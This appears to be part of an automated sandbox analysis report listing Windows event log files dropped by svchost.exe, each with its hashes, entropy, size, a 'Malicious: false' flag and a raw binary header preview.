SHA1:	1815CC405C8B70939C252390E2A1AEC87EFF45F2
SHA-256:	767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
SHA-512:	0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
Malicious:	false
Preview:	ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.178922872218369
Encrypted:	false
SSDEEP:	384:jhfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVo:jhf6xt
MD5:	AFCE634DC5D6C87FEB3B049F4D1EA953
SHA1:	7AEA1171CA419FF7C1DABDC4572049B29232916B
SHA-256:	947FD5BD53B620ADF67E235A3398AF1E70F326E001FA48E32324794E3782F3A9
SHA-512:	2859426739FB343BA35BBF698CABDB88A6AACF1DC77BD1053F1E770A508C51245DBC9AF37905CA5E08B4239C0D913A9820192A88C730F2A28D79E5858FB84E7D
Malicious:	false
Preview:	ElfChnk.............................................n........................................................................-................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.. .............k...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.428162583516058
Encrypted:	false
SSDEEP:	384:dchTm5mcRmNQAFBmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmy:+9wD6CL49mVpgwQFQ
MD5:	41D446C33729788E193C0348E28E39D5
SHA1:	457625761DCDE55E772398802BDB259E2C15013E
SHA-256:	71FB66E7BA61CBB5F72C57BD1997CD2834EFD82B705CA7B71BA74136DD80A549
SHA-512:	3424755A8B76A683F91A989B79CAA05B2C69B3B365AD6081770FF9338EC2F42A776DA29F5DCC2579ADDBE63004007512AFD81DD0B9C1DCAB29848E91A457F371
Malicious:	false
Preview:	ElfChnk..!.......!.......!.......!..........................................................................................c.Wz................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.3522840297387284
Encrypted:	false
SSDEEP:	48:MmiWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHy/dHLP7jMWckH58yk8:FMNVaO8sMa3Z85ZMLarjjP3Z85Zu
MD5:	CB482A274E5D315D0F4D52875F125EE3
SHA1:	4575AF22B1C48558FC93B1553D38862D5347A8B8
SHA-256:	07B84F5C0A8B98D4B81E36A815196BBBAB718D1B8C197B3EC074977591DD5293
SHA-512:	24DA612BC35E869CF5066A624E3321B671BFA9AFE89DE257690C76D7E8F53DEEC612D85F10CDEB4598F0F2396A1D454D35EF65A3CF3CD0E380D4A712E3E833AF
Malicious:	false
Preview:	ElfChnk.....................................p.......[.x......................................................................X..............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.014860518194814
Encrypted:	false
SSDEEP:	1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
MD5:	4FB8E2CF8B3F20534836684947962DC2
SHA1:	B263607E627C81DA77DB65DF5AED2F3FD84B83E2
SHA-256:	DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
SHA-512:	D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
Malicious:	false
Preview:	ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.15655690871689
Encrypted:	false
SSDEEP:	768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
MD5:	2DE60575CB719BF51FAB8A63F696B052
SHA1:	BD44E6B92412898F185D5565865FEA3778573578
SHA-256:	7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
SHA-512:	0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
Malicious:	false
Preview:	ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	72208
Entropy (8bit):	2.258766810319592
Encrypted:	false
SSDEEP:	384:Aro+oayOoXoay/oeoayyovoayroOoayyhdo69CcoTorNorWorbvorTorZorQorNN:wDCYhVR
MD5:	12D653F930A87811C05B2D6E564A6512
SHA1:	AE5CF32764E39E778D87F1D549DEB066777F1970
SHA-256:	3A56527F03E72B739D94CD7D7CF0CC761DC29D5A428A10FA92F66A24737C8775
SHA-512:	20A9A5A2088ACB8A986F6190DF08C4B723602494B48D7AA8A3F10F5D657F4CB73406DF93C503D4A59F1BF233F261416794BF940CEABA201C476175BE379C95C8
Malicious:	false
Preview:	ElfChnk.........)...............)...........Hb...d....8/.....................................................................h.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...... .......MWB................$..............................................................>.......V...7.!..o..............MWB.......&O......'O....0...4... ....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`=/..................l...............K.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8524226245257144
Encrypted:	false
SSDEEP:	384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
MD5:	B8E105CC52B7107E2757421373CBA144
SHA1:	39B61BEA2065C4FBEC143881220B37F3BA50A372
SHA-256:	B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
SHA-512:	7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
Malicious:	false
Preview:	ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8432997252442703
Encrypted:	false
SSDEEP:	384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
MD5:	39EE3557626C7F112A88A4DE12E904C1
SHA1:	C307FECC944D746A49EEA6451B7DA7301F03504C
SHA-256:	2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
SHA-512:	304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
Malicious:	false
Preview:	ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.995520529521179
Encrypted:	false
SSDEEP:	384:1hqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28I:1bCyhLfIXBS5
MD5:	459777E03F90A66F4B09B6634DDE85CB
SHA1:	06322A62D3FF9F64E3FC753A6D0E2CEB184E7854
SHA-256:	26C2362CD0055CFF9E3CBCCEEE8C8061C7DBD476C37218E356666A694AF55ED3
SHA-512:	0BC513AAF896CFCDDB923F3D573E9C3E1321B361C42AE5AEE86BE65D9DB451853CBDAD00D6F31AA67E58C8B3D07DE88E7990C1DD40942F09202DEB227967084E
Malicious:	false
Preview:	ElfChnk.........H...............H...........@.......m.......................................................................:...................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.838106263184782
Encrypted:	false
SSDEEP:	768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
MD5:	A2D41740C1BAF781019F282E37288DDF
SHA1:	A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
SHA-256:	7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
SHA-512:	E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
Malicious:	false
Preview:	ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.634418630947688
Encrypted:	false
SSDEEP:	768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
MD5:	A00BAFFCABB00428EA0512FCECCC55E5
SHA1:	19F7C942DC26C3FF56D6240158734AFF67D6B93E
SHA-256:	92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
SHA-512:	DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
Malicious:	false
Preview:	ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0646587531847893
Encrypted:	false
SSDEEP:	384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
MD5:	399CAF70AC6E1E0C918905B719A0B3DD
SHA1:	62360CD0CA66E23C70E6DE3340698E7C0D789972
SHA-256:	FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
SHA-512:	A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
Malicious:	false
Preview:	ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4364303862010575
Encrypted:	false
SSDEEP:	384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
MD5:	2BB73ACC8F7419459C4BF931AB85352C
SHA1:	F1CE2EB960D3886F76094E2327DD092FC1208C7E
SHA-256:	1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
SHA-512:	7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
Malicious:	false
Preview:	ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m..............................%................ ..................&............0......................*......p..........T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.0631557320109892
Encrypted:	false
SSDEEP:	384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
MD5:	86AEA3A9CA3E5909FD44812754E52BD6
SHA1:	F79B583F83F118AC724A5A4206FC439B88BB8C65
SHA-256:	2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
SHA-512:	17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
Malicious:	false
Preview:	ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4467272005363894
Encrypted:	false
SSDEEP:	384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
MD5:	155681C222D825199B738E8DEC707DC8
SHA1:	704C800E7313F77A218203554E1428DF2819BC34
SHA-256:	1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
SHA-512:	ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
Malicious:	false
Preview:	ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.156155224835584
Encrypted:	false
SSDEEP:	384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
MD5:	F22AC858C2ACC96E8F189E43FFE46FBD
SHA1:	540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
SHA-256:	771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
SHA-512:	B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
Malicious:	false
Preview:	ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9197999988543422
Encrypted:	false
SSDEEP:	384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
MD5:	6C3F290FC62CFA9C240AEE8DB1DBA277
SHA1:	CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
SHA-256:	7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
SHA-512:	D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
Category:	dropped
Size (bytes):	76040
Entropy (8bit):	4.551703952049529
Encrypted:	false
SSDEEP:	768:2LjpPv++M48PFVbUa+53KtLjpPv++M48PFVbUa+53KyY20sMY3Dp13/n/ydIxm6c:LU
MD5:	52B62F9EF6F6A8A8177CC96A362C0C99
SHA1:	840CD0DA9EE506995D762FB377795A33C8702A04
SHA-256:	66FBE53F07500CDFA5A6BA8BC3B9D67AC38F218F30C331003F7BBA89E0C2FA32
SHA-512:	F36CECB4268633349F3C412777361B151CBCD4071D65A684EA1BD96B60CBDF41E601B68142F105662A685995E34B54D6ED16B828AE012D20DE53110ED4D0DF5A
Malicious:	false
Preview:	ElfFile.....................................................................................................................I..ElfChnk......................................$...(...\|N?.....................................................................<..................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	75880
Entropy (8bit):	5.703921633878585
Encrypted:	false
SSDEEP:	384:ohAa5a29o2KbzyzIzWa5KzuzNz0zxzuewKWMKJa5ixhAa5a29o2KbzyzIzWa5KzN:oLyxLy0tHoPwFNfb2Ivrbj/
MD5:	F9E383CB1C56137C15837F31D74B0968
SHA1:	3D1D3EA2A6CE78D1D41165972723050859F93D09
SHA-256:	0F410DA8167031C8FFFCAB932A7AD51618F60536A54EBEC40133F120D6F1154C
SHA-512:	91C38D39CF23A4C0B8BD6BBBC9F5E2F612255F4085A777E74649DDA22AD8EFEE5D94C056001EAA6AA331078BA536BBB2BCC0600509C60D61D5911277BF25ADEC
Malicious:	false
